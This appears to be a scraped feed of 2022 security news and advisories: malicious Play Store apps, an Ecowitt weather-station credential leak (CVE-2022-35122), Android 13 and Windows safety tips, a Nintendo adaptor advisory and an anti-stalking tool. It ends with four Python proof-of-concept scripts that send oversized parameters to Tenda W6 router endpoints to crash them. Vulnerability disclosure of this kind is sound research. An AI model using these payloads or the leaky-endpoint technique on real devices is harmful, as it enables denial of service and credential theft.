By Waqas
Another day, another set of nasty applications on the official Google Play Store. The growing efforts of cyber-criminals…
This is a post from HackRead.com Read the original post: 35 malicious apps found on Google Play Store, installed by 2m users

****Another day, another set of nasty applications on the official Google Play Store.****

The growing efforts of cyber-criminals to have malicious apps listed on the Google Play Store have resulted in some of the most widely used smartphone applications being exposed to malware and banking trojans in recent years.

Despite efforts made by Google to enhance security, researchers continue to expose malicious campaigns that use innovative tactics to get around corporate safety controls.

Now, the IT security researchers at Bitdefender have identified 35 malicious applications on the Play Store with over two million downloads. These apps are designed with methods of action that allow them to masquerade as legitimate ones by changing their names and icons and bombarding the victim’s device with advertisements.

According to Bitdefender, these ads help cybercriminals achieve their monetary goals along with directing victims to malicious sites or links that drop additional malware on the targeted devices.

In their **blog post**, BitDefender’s research team stated that the cybercriminals behind the campaign used several methods to trick victims into keeping the malicious apps on their devices. For instance, some of the apps offered version updates that allowed the attackers to hide and evade detection on the device.

> Many legitimate apps offer ads to their users, but these ones show ads through their own framework, which means they can also serve other types of malware to their victims. Most of the time, users can choose to delete the application if they don’t like it. But these new malicious apps trick victims into installing them, only to change their name and icons and even take some extra steps to conceal their presence on the device.
> 
> Bitdefender

However, one positive aspect of this report is that BitDefender identified the malicious campaign using its (soon to be unveiled) behavioral technology designed to analyze malicious app activity after installation.

Behavioral technology in cybersecurity can be used to track malware behavior across all channels, including websites and social media platforms. This data can then be used to improve the security and user experience in real-time.

> Bitdefender identified the malicious apps using a new real-time behavioral technology designed to detect precisely these dangerous practices, among many others. This new technology is slowly being rolled out to our customer base and will become available to everyone in the coming months.
> 
> Bitdefender

**List of Malicious Apps**

1.  gb.tolltwentytwo.ikey
2.  com.smart.tools.wifi
3.  jkdf.gds.gds.g
4.  com.newsoft.camera
5.  hj.jk.jikj.jkj
6.  finze.lockgti.dae.cag
7.  kk.f.ea.tew.t
8.  sc.qs.vak
9.  zzhse.ge.ge.ge.e
10.  ice.ccylice.volume
11.  ck.lad.secret
12.  smart.ggps.lockakt
13.  am.asm.master
14.  com.charging.show
15.  joao.de.def.e.aew
16.  ifa.nod.vys
17.  qu.motor.astrolog
18.  ice.ccylice.colorize
19.  gb.blindthirty.funkeyfour
20.  com.voice.sleep.sounds
21.  com.creator.smartqrcreator
22.  com.xmas.girlsartwallpaper
23.  gb.theme.twentythreetheme
24.  gb.fiftysubstantiated.wallsfour
25.  com.xmas.artgirlswallpaperhd
26.  gb.packlivewalls.fournatewren
27.  gb.labcamerathirty.mathcamera
28.  gb.mega.sixtyeffectcameravideo
29.  gb.actualfifty.sevenelegantvideo
30.  de.eightylamocenko.editioneight
31.  gb.helectronsoftforty.comlivefour
32.  gb.crediblefifty.editconvincingeight
33.  gb.convenientsoftfiftyreal.threeborder
34.  gb.sixtycreativecyber.magiceleganttwo
35.  gb.convincingmomentumeightyverified.realgamequicksix

**Protection Against Malicious Apps**

With more than two billion active Android devices, it is no wonder that the Google Play Store is a target for malware developers. It’s no secret that the Google Play Store is home to some nasty malware including **DawDropper**, **Joker**, **SharkBot**, **Xenomorph,** and many more.

However, at the same time, it is one of the most secure platforms to download Android apps. So how can you protect your phone from all of the bad stuff? Here are a few tips:

1.  First, make sure you’re running the latest version of Android. Google is constantly working to improve security on the platform, so newer versions of Android are less vulnerable to attack.  
    
2.  Next, take a look at the app permissions before installing anything from the Play Store. If an app asks for more permissions than it needs, that’s a red flag that it might be up to no good.  
    
3.  Install a reputable security app from the Play Store. This will add an extra layer of protection to your device, catching any malware that slips through the cracks.  
    
4.  Only download apps from trusted sources. This means avoiding third-party app stores and websites – Stick to the Google Play Store.  
    
5.  Finally, check reviews before downloading an app. If an app has a lot of negative reviews, it’s probably not worth your time. (**_Read how fake reviews cause 50% of threats against Android_**).

1.  **Play Store Apps Caught Spreading Android Malware to Millions**
2.  **BRATA Android malware factory resets phones after stealing funds**
3.  **New MaliBot Android Malware Found Stealing Personal, Banking Data**
4.  **Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets**
5.  **New Russian Android Malware Tracks GPS Location and Spies on Victims**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

35 malicious apps found on Google Play Store, installed by 2m users

An access control issue in Ecowitt GW1100 Series Weather Stations <=GW1100B_v2.1.5 allows unauthenticated attackers to access sensitive information including device and local WiFi passwords.

I recently purchased the ECOWITT GW1102 Home Weather Station. It’s exactly what it sounds like – a mini weather station for your house. It has all the usual sensors you’d expect a weather station to have, and I’m actually very pleased with the hardware, considering the cheap price.

However, it is missing one thing – software security. But really, what did I expect from a cheap home weather station?

Comically, the landing page of the weather station’s server gives an illusion of some sort of security.

Password goes here.

Let’s intercept a request of us logging in.

Don’t steal my password.

This is all over HTTP. We post our password to /set_login_info – which seems like an odd endpoint for logging in. Notice the response does not set any cookies or seem like it actually does any sort of verification. Hmmm.

Anyway, after logging in, we are directed to /liveData.html. This page does exactly what its name implies. But let’s look at the links on the side of the page – particularly the Local Network link.

Click the Local Network link on the left-hand side.

If we intercept the requests in Burp after we click the Local Network link, we see a call to a /get_network_info endpoint. This returns info about the WiFi network to which the weather station is connected.

That’s my WiFi SSID and password.

Interesting. Notice again that there appears to be no authentication going on with this request. Let’s try to curl this endpoint

Uh oh.

Or how about the device password (not that you actually need the password now).

The password is now Weather24689 because I changed it without being authorized.

You can also do fun things like reboot the station, or get the user’s external weather reporting site’s API keys, etc. I notified ECOWITT support, but I’m assuming this won’t be fixed any time soon.

Edit: added this because someone didn’t understand this is an issue.

Edit: I added this picture above of the get\_ws\_settings endpoint. As you can see, I’m not using any authentication. You can also see I was trying some shenanigans, but nonetheless, you can also see this returns several API keys for other services, which is not a good thing to be handing out. It basically is the API endpoint for this page that is behind the ‘authentication’ of the application.

I _**did**_ find some of these exposed to the internet, but I’d probably avoid that, if I were you. With that said, I actually like the hardware. It’s fun to play around with, and it is inexpensive.

CVE-2022-35122: The Incredibly Insecure Weather Station

Google’s new mobile operating system has arrived. Take back some control with these privacy and security tips.

It's late summer in the northern hemisphere, which means new phone operating systems are coming. In a few weeks, Apple will release iOS 16 to millions of iPhones and iPads around the world. Google, meanwhile, has already made the latest version of Android available—on some phones you can now download Android 13.

The newest version of the Android operating system is more “evolution than revolution,” with the majority of changes smaller than in previous iterations. But Android’s security team is trying to simplify people’s privacy options throughout Android 13. This version of the OS involves changes under the hood for app developers and some streamlined security options for users.

You probably don’t spend a lot of time thinking about the privacy and security settings on your phone. However, whenever you download a new operating system, it’s worth spending a few minutes scrolling and tapping through all the options you haven’t touched in the past 12 months. Here’s what you should take a look at on Android 13.

Clamp Down on App Permissions

In Android 12, Google introduced “nearby device” permissions. This was designed to stop your headphones app from requesting your precise location when it was trying to wirelessly connect to your headphones. Android 13 expands on these controls to stop apps from using Wi-Fi permissions to collect your location data. In their code, app developers have to specify that they will never use Wi-Fi APIs to access location information.

Android’s **Privacy dashboard** has also been updated. The dashboard, which can be accessed through **Settings >** **Privacy**, shows the permissions you have given apps to use—this includes the apps that can access your camera, contacts, and multiple other sensors and types of data. It will now show which apps have used each permission over the past seven days, rather than just 24 hours.

Some of the privacy changes in Android 13 don’t require you to do anything, but it is worth knowing about them anyway. For instance, the OS will start deleting your clipboard history automatically after a short period of time so that apps don’t snoop on the information you previously copied. Also, from now on, apps that use Google’s advertising ID, which is a unique code assigned to your device, must declare the ad ID permission in their documentation. “If your app does not declare this permission when targeting Android 13 or higher, the advertising ID is automatically removed and replaced with a string of zeroes,” Google says.

Photo Picker

When you want to use a photo you’ve taken in another app—for instance, as a Twitter profile photo or to share images with friends—your device uses Photo Picker. This loads up a screen that includes the photos on your device and gives you the option to use them in the app you’re in. The new privacy changes in Android 13 mean you won’t automatically give an app access to all your photos and videos. Instead, the photo picker will now only give the app access to the photos you allow it.

In addition, Android’s developer pages state that if apps want to use images, audio, or video that other apps have created, they must explicitly say the type of files they want access to and give you clear prompts that this will happen.

More Notification Control

Few things are more infuriating than apps that send a constant barrage of notifications. And there are some notifications you may not want appearing on your screen for anyone nearby to see. While it has been possible to control app notifications for some time, Android 13 is making it easier to do so from the outset. Now, when you open up an app for the first time or use it for the first time in a while, you’ll be asked if you want it to send you notifications. Spammy notifications, be gone.

Other Security and Privacy Options

While you’re thinking about your phone’s privacy settings, it’s worth taking some time to flick through your device’s other options to boost your overall protection. It’s possible there are previous changes that you’ve missed. The vast majority of the settings below can be changed by visiting **Settings** on your Android and then following the specific options.

In the **Security** section, Android provides you with an overview of your device’s status. It will show you when the last security update was applied, let you set a screen lock and fingerprint or biometric unlocking (if your device supports them), and let you go through Google’s wider security checkup that looks at the current state of your accounts. (Later this year, Android will introduce a new **Security & privacy** option that will put all of these settings in one place.)

In the **Privacy** menu, there are a few things you should change. The **Privacy dashboard**, as described above, will show you which apps have used which sensors and data on your phone in the past seven days. After looking at this, you should tap on **Permission manager**, where you’ll be presented with all the sensors and types of data that your phone can give to apps. These range from your location and camera access to your calendar and files. You should look through each of the permissions and decide if an app really needs access to them to function.

Next in **Privacy**, you should open **Google location history** and **Activity controls**. Both of these options are linked to your wider Google account(s), but the settings here allow you to control what data Google keeps about you—it’s a lot. Using these options, you can wipe your web and activity data, the locations Google keeps on your movements, and details such as YouTube search history.

Then head to **Privacy** and **Ads**. Here you can use **Reset advertising ID** to change the ID Google has assigned to your phone. This advertising ID is used by apps and advertisers across the web to track your interests and show you potentially creepy personalized advertising. As well as resetting your ad ID, there’s an option to **Delete advertising ID**, meaning “apps can no longer use this advertising ID to show you personalized ads.”

Finally, while you’re thinking about your digital privacy and security, you should make sure you are using a password manager to protect your online life and using multi-factor authentication wherever possible.

The Android 13 Privacy Settings You Should Update Now

Categories: Personal
What to think about when preparing your child's Windows device for the new school year.



(Read more...)




The post How to secure a Windows PC for your kids appeared first on Malwarebytes Labs.

With the return to school fast approaching, it's time to ready the things your kids will need to pass the next year with flying colors. Increasingly, that means computing devices, which means you'll need to spend time thinking about the safety and security of what they will be using.

In our “Back to School” series we will talk about several types of devices you may encounter. This one is about Windows devices.

**The basics**

You know that when your kids are hard at work, they can’t be bothered with all the warnings, notifications, EULA’s and what not. They are relentless in their pursuit of high grades, and maybe some less admirable goals. To achieve these goals they will click "OK" on anything that stands in their way. So, what you need to set up for them is something that gives them enough room to be a bit reckless.

Not that it’s wrong to give them a certain amount of responsibility or at least inform them about what you did to keep them secure. If they know and understand the goal, most of them will be more than happy to keep their system operational.

With that in mind, here are some security basics that you should attend to just as you would on any Windows computer:

*   **Apply security updates promptly. All the software on the computer needs to be maintained by installing the latest security updates when they become available. Fortunately, Windows 10 will update itself automatically, as will popular modern web browsers like Edge, Chrome, and Firefox. We suggest that you turn on automatic updates for the Microsoft Store, which will take care of any software you download from there. Whatever software those steps don't cover will need to be checked occasionally to see if there are newer versions available.**
*   **Use security software. Modern versions of Windows have lots of helpful security features, but Windows is still the most popular target for malware, so we strongly recommend that you install a third-party security solution like Malwarebytes Premium.**
*   **Start backing up. The only backup people ever regret is the one they didn't make, so read Microsoft's short guide to Backup and Restore in Windows, and get yours working on day one. Backups are your last line of defense against system-altering malware, like ransomware or wipers, as well as bad software updates, and hardware failure or theft. They will also protect your child's work against the inevitable accident of your kid deleting their most important assignment the night before it's due.**
*   **Install a password manager. A password manager is software for creating and remembering strong passwords. Good ones also provide a safe way for users to share passwords with other people. Install one on your Windows computer and get your child using it as soon as possible. Proper password handling is something lots of adults struggle with, so get your kids doing the right thing from day one.**
*   **Give your child a local user account. Even if your child is the only person using the computer, create a separate local user account for them with limited permissions. Use a different account with administrator privileges to make changes to the computer, like installing software. Don't share the administrator account with your child and never use it for work, web browsing or email. Malware will typically use the same permissions as the account that runs it. If your child accidentally runs malware as a local user, it will be not be able to alter the machine.**

**Other considerations****If the device isn't your property**

If the Windows device is provided by the school or another organization, your options for implementing your own security ideas may be very limited, but that's OK, it just means somebody is doing it for you. It's usual for IT staff from the school to setup and manage this kind of computer and to give your child access to a standard local user account. That should be enough access for your child to do what they need to without getting into too much trouble.

**Parental controls**

Children search Google for the weirdest things and topics. Whether they searched for something on purpose or just because they didn’t know what it meant, search results for some phrases are best not seen by young children.

The parental controls included with Windows allow you to enforce restrictions on screen time; block apps, websites, and games; and provide reports on what your child has been doing with their device.

Parental controls can be useful to limit the risks your children run into online, but you should know up front that they cannot eliminate every risk out there. Read our article about parental controls to learn what they can and can’t do for you.

**Social media, messaging, and games**

Children are inclined to share their entire lives with their friends, and keen to get their hands on the phones, computers, and accounts that will let them do it online. Unfortunately, social media, messaging apps, and gaming come with risks: It is easy for predators to hide behind a picture of a child and a believable persona, there is no break at the end of the school day from the bullying and harassment that happens online, and gaming communities can be rough and unforgiving.

Like many other aspects of the adult world, children deserve to be introduced to these things in a careful, supervised manner, and many parents opt for some kind of digital oversight or restrictions. (It is worth noting too, that most social media apps have a minimum age requirement of 13, although as a recent Omegle investigation showed, you cannot assume a platform will enforce its age restrictions or that its moderators will keep your children safe).

Alongside whatever tools or techniques you use to keep children safe online, we recommend teaching them responsible digital citizenship from an early age, to help understand the dangers, and to recognize cyberbullying and harmful content. Establishing guidelines and teaching them responsible online communication and etiquette will help them to communicate respectfully, with responsibility and confidence.

**Wi-Fi**

By default, Windows 10 will connect automatically to Wi-Fi networks you have used at least once. With a device moving back and forth between home and school, this creates an opportunity for an attacker (perhaps another student) to set up a network with the same name. These so-called “evil twin” Wi-Fi network attacks simulate known networks and can be used to perform a machine-in-the-middle attack (MitM).

The only way to easily protect against these attacks is by disabling the auto-connect feature. You can do this by removing the check mark when you connect to the network or in the properties of the connection by turning the "Connect automatically" option off. After doing this you can manually check the available Wi-Fi networks on location and look if there are two identical SSIDs (network names). The evil twin will not have a lock symbol near the strength indicator.

**Low maintenance**

In the past we have posted suggestions about how to set up a computer that requires a minimum of attention afterwards, which we called minimum effort for maximum protection. While this may seem like an attractive solution for your children, it’s important to realize that it does require some degree of security awareness of the computer user.

While this may not be suitable for all ages, it is an approach you might want to take with older children if you are trying to involve them in the process of understanding and securing their own device.

**The other side**

Depending on their age and computer skills, you will want to talk your kids through what you did and why. A class full of determined teenagers will break through your defenses in no time at all. If they understand what you are trying to protect them from they may use those same skills to steer clear of those dangers.

How to secure a Windows PC for your kids

OS command injection vulnerability in Nintendo Wi-Fi Network Adaptor WAP-001 All versions allows an attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.

Published:2022/07/29  Last Updated:2022/07/29

**Overview**

Nintendo Wi-Fi Network Adaptor WAP-001 provided by Nintendo Co.,Ltd. contains multiple vulnerabilities.

**Products Affected**

*   Nintendo Wi-Fi Network Adaptor WAP-001 all versions

**Description**

Nintendo Wi-Fi Network Adaptor provided by Nintendo Co.,Ltd. contains multiple vulnerabilities listed below.

*   **OS command injection (CWE-78)** - CVE-2022-36381
    
    CVSS v3
    
    CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 6.8**
    
    CVSS v2
    
    AV:A/AC:L/Au:S/C:P/I:P/A:P
    
    **Base Score: 5.2**
    
*   **Buffer overflow (CWE-121)** - CVE-2022-36293
    
    CVSS v3
    
    CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 6.8**
    
    CVSS v2
    
    AV:A/AC:L/Au:S/C:P/I:P/A:P
    
    **Base Score: 5.2**
    

**Impact**

*   A user who can access the administrative page of the product may execute an arbitrary OS command - CVE-2022-36381
*   A user who can access the administrative page of the product may execute an arbitrary code - CVE-2022-36293

**Solution**

**Stop using the product**  
The developer states that the product is no longer supported, therefore recommends users to stop using the product.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc reported these vulnerabilities to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2022-36381: Multiple vulnerabilities in Nintendo Wi-Fi Network Adaptor WAP-001

Categories: News
Categories: Privacy
At Black Hat, a cybersecurity expert presented an anti-stalking tool they made for a friend.



(Read more...)




The post Anti-tracking tool tells you if you're being followed appeared first on Malwarebytes Labs.

Posted: August 12, 2022 by

If there is one thing we know about the people around us, even the perfect strangers, it's that they almost all have smartphones. And those smartphones aren't merely passive receivers, they're broadcasting constantly, looking for things you might want to connect to.

Advertisers have exploited the electronic noise that smartphones make for years, using it to track people in places like shopping malls. But now a security researcher has used the same idea to detect if you're being followed.

Matt Edmondson had the idea for the tool when a friend of his, who also works for the government, expressed concerns about being tailed when meeting a confidential informant who had ties to a terrorist organization. Although the friend is skilled at escaping those following them by car, he was looking for "an electronic supplement".

"He was worried about the safety of the confidential informant," Edmondson explained to Wired.

Edmondson wears many hats. He served as a federal agent for the US Department of Homeland Security for 21 years; he is the founder of an infosec consultation company; a hacker; a certified SANS instructor; and a digital forensics expert. Suffice it to say, he has the skills and experience to create something that would make someone safe using parts that don't cost much, some open-source Python code, and a Raspberry Pi.

Edmondson presented his project at Black Hat on Thursday. His talk, Chasing Your Tail With a Raspberry Pi, touched on how he assembled the anti-tracking device, the challenges encountered when building it, and some best practices to consider, including creating an ignore list for friendly smartphones, and the importance of randomizing your MAC address (the rarely-changed identifier that allows others to track your smart phone).

The anti-tracking device works by scanning for wireless devices and checking if these have been present within the past 20 minutes. Unlike tools made to scan stationary devices, Edmonson’s machine was designed to scan moving ones. This is necessary as the act of tailing requires movement.

The device can fit in a shoebox and is in a waterproof case. It has a Wi-Fi card that runs Kismet (a popular wireless network detector), a portable charger, and a touchscreen where the user sees alerts. Each alert solidifies the possibility that one is being tailed.

“It’s purely designed to try to tell you that you’re seeing something now that you were also seeing a few minutes ago,” Edmondson says. “This isn’t designed to follow people in any way, shape, or form.”

Edmondson pleads with the tech community to take digital tracking and surveillance seriously. “It was really kind of disheartening and depressing to look at the ratio of tools to spy on people versus tools to help you not get spied on,” he says.

**RELATED ARTICLES**

Anti-tracking tool tells you if you're being followed

A stack overflow vulnerability exists in /goform/WifiMacFilterSet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

Tenda W6 is an enterprise wireless AP router from Shenzhen Tenda Technology (Tenda) in China.

A stack overflow vulnerability exists in /goform/WifiMacFilterSet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/WifiMacFilterSet"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x300

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

CVE-2022-35561: IOT/Tenda/W6/stackoverflow/WifiMacFilterSet at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/wifiSSIDset in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/wifiSSIDset in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/wifiSSIDset"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x200

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

CVE-2022-35560: IOT/Tenda/W6/stackoverflow/wifiSSIDset at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/WifiMacFilterGet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

**Tenda W6 Stack Overflow Vulnerability****Device Vulnerability Introduction**

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/WifiMacFilterGet in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

The firmware can be downloaded at: https://www.tenda.com.cn/download/detail-2576.html

**Vulnerability Location**

/goform/WifiMacFilterGet

formWifiMacFilterGet() Function

**Exp**

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/WifiMacFilterGet"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x140

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

**Please see the video for the demonstration process**

CVE-2022-35558: IOT/Tenda/W6/stackoverflow/WifiMacFilterGet at main · ilovekeer/IOT

A stack overflow vulnerability exists in /goform/wifiSSIDget in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

**Tenda W6 Stack Overflow Vulnerability****Device Vulnerability Introduction**

Tenda W6 is an enterprise wireless AP router from Tenda Technology (Shenzhen, China).

A stack overflow vulnerability exists in /goform/wifiSSIDget in Tenda W6 V1.0.0.9(4122) version, which can be exploited by attackers to cause a denial of service (DoS) via the index parameter.

The firmware can be downloaded at: https://www.tenda.com.cn/download/detail-2576.html

**Vulnerability Location**

/goform/wifiSSIDget

formwrlSSIDget()

**Exp**

import requests
from pwn import \*

burp0\_url \= "http://192.168.5.1/goform/wifiSSIDget"
burp0\_headers \= {"Host":"192.168.5.1",
"Content-Length":"295",
"Accept":"\*/\*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin":"http://192.168.5.1",
"Referer":"http://192.168.5.1/main.html",
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"en-US,en;q=0.9",
"Cookie":"user=",
"Connection":"close"}

data1\="index="+'a'\*0x1000

requests.post(burp0\_url,headers\=burp0\_headers,data\=data1, verify\=False,timeout\=1)

**Please see the video for the demonstration**

Tag

#wifi